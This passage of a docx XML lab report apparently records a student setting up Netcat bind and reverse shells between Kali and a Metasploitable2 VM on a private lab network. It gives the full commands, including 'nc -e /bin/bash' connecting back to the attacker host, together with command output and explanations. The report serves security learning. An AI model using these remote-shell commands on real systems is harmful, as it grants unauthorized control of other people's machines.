          <w:p w14:paraId="1C3E590A" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00565784">
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1EEA8C02" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="BDBDBD"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t># On Kali (attacker) — 192.168.56.101</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2709E51F" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="F0F0F0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>$ nc 192.168.56.102 4444</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41A7992C" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="F0F0F0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>$ whoami</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55AC0EB1" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="F0F0F0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>$ ls -la</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0C3E1E11" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:before="260" w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
        <w:t>What I Learned</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46141B03" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="300" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="262626"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>nc -lvnp 4444 -e /bin/bash tells Netcat to listen (-l) verbosely (-v), skip DNS lookups (-n), on port 4444 (-p 4444), and to hand any connection straight to /bin/bash (-e). Once Kali connected with a plain nc 192.168.56.102 4444, anything typed on the Kali terminal was sent to that Bash process running on Metasploitable2, and Bash's replies were sent back — with no visible prompt, since only the shell's actual output (not its prompt string) travels over a plain pipe like this.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5D1BB5" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="300" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="262626"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Running whoami and ls -la from the Kali side confirmed the shell was real and running on the target: whoami returned msfadmin (the account the listener was started as), and ls -la listed Metasploitable2's home directory, including the receiveed.txt file created in an earlier practical.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AFCAB85" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="140" w:after="100"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="046C334F" wp14:editId="45F91E70">
            <wp:extent cx="5848350"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3076575"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4CF311" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="220"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="4D4D4D"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Figure 1 — Metasploitable2 (left) running the bind-shell listener, and Kali (right) connected to it, running whoami and ls -la on the target.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5000"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2998"/>
        <w:gridCol w:w="7036"/>
      </w:tblGrid>
      <w:tr w:rsidR="00565784" w14:paraId="5F7817B6" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="333333"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="180" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="180" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7515C6CA" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>RESULT SUMMARY</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00565784" w14:paraId="4BD74BFE" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="333333"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1D32835A" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Item</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7040" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="000000"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="35E5CC31" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Observation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00565784" w14:paraId="6BA6FB57"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1D8B2119" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Listener command</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7040" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7D817D0B" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="262626"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>nc -lvnp 4444 -e /bin/bash (Metasploitable2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00565784" w14:paraId="51EA0D84"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00052BA0" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Connect command</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7040" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="616745B5" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="262626"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>nc 192.168.56.102 4444 (Kali)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00565784" w14:paraId="54D0EE40"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1B1563B6" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Connection reported</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7040" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1E9F0008" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="262626"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>connect to [192.168.56.102] from (UNKNOWN) [192.168.56.101] 34134</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00565784" w14:paraId="075130F5"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6E50E1B1" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>whoami result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7040" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2FEF3857" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="262626"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>msfadmin</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00565784" w14:paraId="7A6E9870"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50CFE831" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>ls -la result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7040" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="530B7AB0" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="262626"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Metasploitable2's home directory listing, shown on the Kali terminal</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7FDAED1B" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00565784">
      <w:pPr>
        <w:spacing w:before="160"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5000" w:type="pct"/>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0"/>
      </w:tblGrid>
      <w:tr w:rsidR="00565784" w14:paraId="61A8F448" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="160" w:type="dxa"/>
              <w:left w:w="220" w:type="dxa"/>
              <w:bottom w:w="160" w:type="dxa"/>
              <w:right w:w="220" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0CC71EB8" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>My Observation</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DF240B3" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
              </w:rPr>
              <w:t>A bind shell needs the target to already be listening, which means either the target was compromised earlier and this was planted, or there is a vulnerability that starts this listener for you (which is exactly what several Metasploitable2 services simulate). Its weakness as an attack technique is exposure: an always-open listening port on the target is something a port scan (Practical 2) or a firewall can catch. That is the main reason attackers generally prefer a reverse shell, which is what I set up next.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="29B06585" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="6" w:color="333333"/>
        </w:pBdr>
        <w:spacing w:before="360" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>2. Reverse Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F33605A" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="300" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="262626"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>A reverse shell flips the direction: the attacker sets up the listener first, and the target initiates the outbound connection into it, handing over a shell. This practical ran the listener on Kali and had Metasploitable2 connect out to it.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0"/>
      </w:tblGrid>
      <w:tr w:rsidR="00565784" w14:paraId="3D7E4B8C" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="000000"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="180" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="180" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="21045003" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>COMMANDS USED</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00565784" w14:paraId="683216BD" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1A1A1A"/>
            <w:tcMar>
              <w:top w:w="160" w:type="dxa"/>
              <w:left w:w="200" w:type="dxa"/>
              <w:bottom w:w="160" w:type="dxa"/>
              <w:right w:w="200" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="31250623" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="BDBDBD"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t># On Kali (attacker) — 192.168.56.101</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7469431B" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="F0F0F0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>$ nc -lvnp 4444</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05404D36" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00565784">
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0EDEC166" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="BDBDBD"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t># On Metasploitable2 (target) — 192.168.56.102</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12AE230D" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="F0F0F0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>$ nc -e /bin/bash 192.168.56.101 4444</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D8357A7" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="F0F0F0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>$ whoami</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72C688C4" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="F0F0F0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>$ ls -la</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4579C502" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="F0F0F0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>$ cd kali_Documents</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B87B6AA" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="F0F0F0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>$ ls</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="507788E6" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="F0F0F0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>$ touch names.txt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14CBC430" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="F0F0F0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>$ ls</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="649F3E6E" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:before="260" w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
        <w:t>What I Learned</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2ADFC5" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="300" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="262626"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>This time Kali started the listener first with nc -lvnp 4444 — verbose, numeric, listening on port 4444 — and simply waited. On Metasploitable2, nc -e /bin/bash 192.168.56.101 4444 connected out to Kali's address and port and attached its own Bash process to that outgoing connection. As soon as the connection landed, the shell prompt on Kali's terminal effectively became Metasploitable2's shell: every command typed there (whoami, ls -la, cd, touch) ran on the target, not on Kali.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D7724B" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="300" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="262626"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>The commands confirmed this: whoami again returned msfadmin, and ls -la showed the same Metasploitable2 home directory as the bind shell. Changing into kali_Documents and creating names.txt with touch, then listing the directory again to see it appear, demonstrated that this is a fully interactive, persistent shell — not a one-off command — capable of navigating the filesystem and creating files, exactly like a normal terminal session on the target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B48660A" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="140" w:after="100"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01118622" wp14:editId="185378DB">
            <wp:extent cx="5848350" cy="3095625"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1669875170" name="Picture 166987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3095625"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="437F495A" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="220"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="4D4D4D"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Figure 2 — Kali (right) listening and receiving Metasploitable2's outbound connection (left), then running commands on the target, including creating names.txt inside kali_Documents.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5000"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CellMar>
          <w:left w:w="10" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
